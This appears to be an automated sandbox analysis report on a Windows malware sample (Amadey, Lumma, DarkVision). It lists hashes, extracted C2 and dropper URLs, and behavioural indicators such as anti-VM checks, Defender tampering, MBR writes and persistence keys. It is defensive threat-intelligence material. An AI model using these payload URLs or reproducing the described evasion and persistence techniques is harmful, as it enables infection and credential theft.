amadey | d9f5904cf565a34c457d11451d4cae41a13d7183fb10b57fa8b7c01e994f6b14

Analysis

max time kernel
126s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
06/04/2025, 14:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-06_5c9fe9a15513cf95fc1059021f6150ec_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

5c9fe9a15513cf95fc1059021f6150ec
SHA1

69e227f9ab4cb895ab2a6cd1b3bbde37067514d2
SHA256

d9f5904cf565a34c457d11451d4cae41a13d7183fb10b57fa8b7c01e994f6b14
SHA512

93f809a705a333dd43810aa09b8a8fb169fe7927866bbf523305964ef37c3a0345fe9f6bb55e1c869462638b0eec136069edb535280a5d512c8a16d770fb0d7c
SSDEEP

24576:WqDEvCTbMWu7rQYlBQcBiT6rprG8a01u:WTvC/MTQYxsWR7a01

Score

10^/10

amadey darkvision lumma 092155 bootkit defense_evasion discovery execution exploit persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

https://plantainklj.run/opafg

https://jrxsafer.top/shpaoz

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://cosmosyf.top/GOsznj

https://yjrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://pepperiop.digital/oage

https://oquavabvc.top/iuzhd

https://6yhtargett.top/dsANGt

https://8yrambutanvcx.run/adioz

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

Extracted

Family

darkvision

82.29.67.160

Attributes

url
http://107.174.192.179/data/003

https://grabify.link/ZATFQO

http://107.174.192.179/clean
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	477a2709cb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8ca730f2af.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2d31581511.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
13	3472	powershell.exe
179	4388	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3472	powershell.exe
4388	powershell.exe
11660	powershell.exe
11540	powershell.exe
5364	powershell.exe
13472	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 18 IoCs

flow	pid	Process
13	3472	powershell.exe
179	4388	powershell.exe
256	1420	rapes.exe
256	1420	rapes.exe
256	1420	rapes.exe
256	1420	rapes.exe
256	1420	rapes.exe
341	1420	rapes.exe
28	1420	rapes.exe
28	1420	rapes.exe
28	1420	rapes.exe
28	1420	rapes.exe
28	1420	rapes.exe
28	1420	rapes.exe
28	1420	rapes.exe
28	1420	rapes.exe
193	1420	rapes.exe
222	1308	svchost.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\6bbb4d94.sys	91d827b1.exe
File created	C:\Windows\System32\Drivers\klupd_6bbb4d94a_arkmon.sys	91d827b1.exe
File created	C:\Windows\System32\Drivers\klupd_6bbb4d94a_klbg.sys	91d827b1.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5420	takeown.exe
5260	icacls.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\6bbb4d94\ImagePath = "System32\\Drivers\\6bbb4d94.sys"	91d827b1.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_arkmon.sys"	91d827b1.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klbg\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klbg.sys"	91d827b1.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_klark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_klark.sys"	91d827b1.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_mark\ImagePath = "System32\\Drivers\\klupd_6bbb4d94a_mark.sys"	91d827b1.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_6bbb4d94a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_6bbb4d94a_arkmon.sys"	91d827b1.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2d31581511.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2d31581511.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8ab34a2e7b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	477a2709cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	477a2709cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8ca730f2af.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8ab34a2e7b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8ca730f2af.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	b0c6ece98a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	272.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	larBxd7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	5uMVCoG.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	272.exe

Deletes itself 1 IoCs

pid	Process
5484	w32tm.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5uMVCoG.exe	5uMVCoG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5uMVCoG.exe	5uMVCoG.exe

Executes dropped EXE 36 IoCs

pid	Process
1772	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
1420	rapes.exe
916	5uMVCoG.exe
4592	5uMVCoG.exe
4588	mtCxnCB.exe
2344	5ffcd2add8.exe
4792	2d31581511.exe
4436	8ab34a2e7b.exe
1500	66c8304a39.exe
1960	b0c6ece98a.exe
1172	272.exe
1284	272.exe
5236	5uMVCoG.exe
5668	rapes.exe
5188	a0c10da70a.exe
1956	8236752b21.exe
5348	0ff8e92974.exe
4904	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
2752	477a2709cb.exe
5360	mtCxnCB.exe
5764	UZPt0hR.exe
5748	n0hEgR9.exe
2864	tzutil.exe
5484	w32tm.exe
13784	larBxd7.exe
6328	Jordan.com
6508	8ca730f2af.exe
6740	Rm3cVPI.exe
6772	5uMVCoG.exe
6812	rapes.exe
6944	6fd55bf8.exe
7148	9sWdA2p.exe
7728	91d827b1.exe
8172	VrQSuEQ.exe
9552	RYZusWg.exe
12988	LJl8AAr.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	477a2709cb.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	8ca730f2af.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	2d31581511.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys	91d827b1.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\6bbb4d94.sys\ = "Driver"	91d827b1.exe

Loads dropped DLL 25 IoCs

pid	Process
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe
7728	91d827b1.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5420	takeown.exe
5260	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\bdd19b89-ceb6-4fe1-bf01-79db19d6e395 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{f57f25a7-42b9-4244-8ecf-41f8eda17a95}\\bdd19b89-ceb6-4fe1-bf01-79db19d6e395.cmd\""	91d827b1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5uMVCoG = "C:\\Users\\Admin\\AppData\\Roaming\\5uMVCoG.exe"	5uMVCoG.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2d31581511.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478870101\\2d31581511.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8ab34a2e7b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478880101\\8ab34a2e7b.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\66c8304a39.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478890101\\66c8304a39.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b0c6ece98a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10478900101\\b0c6ece98a.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	91d827b1.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	8ca730f2af.exe
File opened for modification	\??\PhysicalDrive0	91d827b1.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000700000001e6aa-151.dat	autoit_exe
behavioral1/files/0x0007000000024243-622.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
4500	tasklist.exe
7660	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
1772	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
1420	rapes.exe
4792	2d31581511.exe
5668	rapes.exe
4904	TempQIMUMRD3WIZFFFUBHKKT9M9EPQWUARYS.EXE
2752	477a2709cb.exe
6508	8ca730f2af.exe
6812	rapes.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2344 set thread context of 3508	2344	5ffcd2add8.exe	112
PID 5748 set thread context of 5456	5748	n0hEgR9.exe	240
PID 8172 set thread context of 8188	8172	VrQSuEQ.exe	274
PID 12988 set thread context of 13076	12988	LJl8AAr.exe	297

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	6fd55bf8.exe
File opened (read-only)	\??\VBoxMiniRdrDN	91d827b1.exe

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
File opened for modification	C:\Windows\GovernmentalOttawa	larBxd7.exe
File opened for modification	C:\Windows\AmongDouble	larBxd7.exe
File opened for modification	C:\Windows\GentleOklahoma	larBxd7.exe
File opened for modification	C:\Windows\ModularVol	larBxd7.exe
File opened for modification	C:\Windows\LowerOrgasm	larBxd7.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5360	sc.exe
5720	sc.exe
5760	sc.exe
5996	sc.exe
4584	sc.exe
5536	sc.exe
6048	sc.exe
4408	sc.exe
5456	sc.exe
5644	sc.exe
5492	sc.exe
2828	sc.exe
5472	sc.exe
5428	sc.exe
864	sc.exe
5372	sc.exe
5688	sc.exe
5220	sc.exe
2064	sc.exe
2872	sc.exe
5280	sc.exe
5312	sc.exe
5608	sc.exe
5252	sc.exe
5248	sc.exe
5732	sc.exe
6140	sc.exe
5180	sc.exe
5272	sc.exe
6044	sc.exe
5632	sc.exe
4196	sc.exe
5176	sc.exe
5292	sc.exe
5468	sc.exe
5768	sc.exe
5408	sc.exe
5476	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2d31581511.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	66c8304a39.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	477a2709cb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8ca730f2af.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Jordan.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mtCxnCB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6fd55bf8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0ff8e92974.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempBPN7XGQOVOE7VLAGDQLWQDPY4NWY2LCO.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mtCxnCB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6204	PING.EXE
8932	PING.EXE
13564	PING.EXE
5248	PING.EXE
10180	PING.EXE
11192	PING.EXE
13016	PING.EXE
13984	PING.EXE
8100	PING.EXE
9256	PING.EXE
9348	PING.EXE
9436	PING.EXE
2240	PING.EXE
9352	PING.EXE
13240	PING.EXE
2384	PING.EXE
8100	PING.EXE
13264	PING.EXE
9892	PING.EXE
13360	PING.EXE
9272	PING.EXE
13448	PING.EXE
14004	PING.EXE
14032	PING.EXE
8324	PING.EXE
5148	PING.EXE
11024	PING.EXE
13172	PING.EXE
8972	PING.EXE
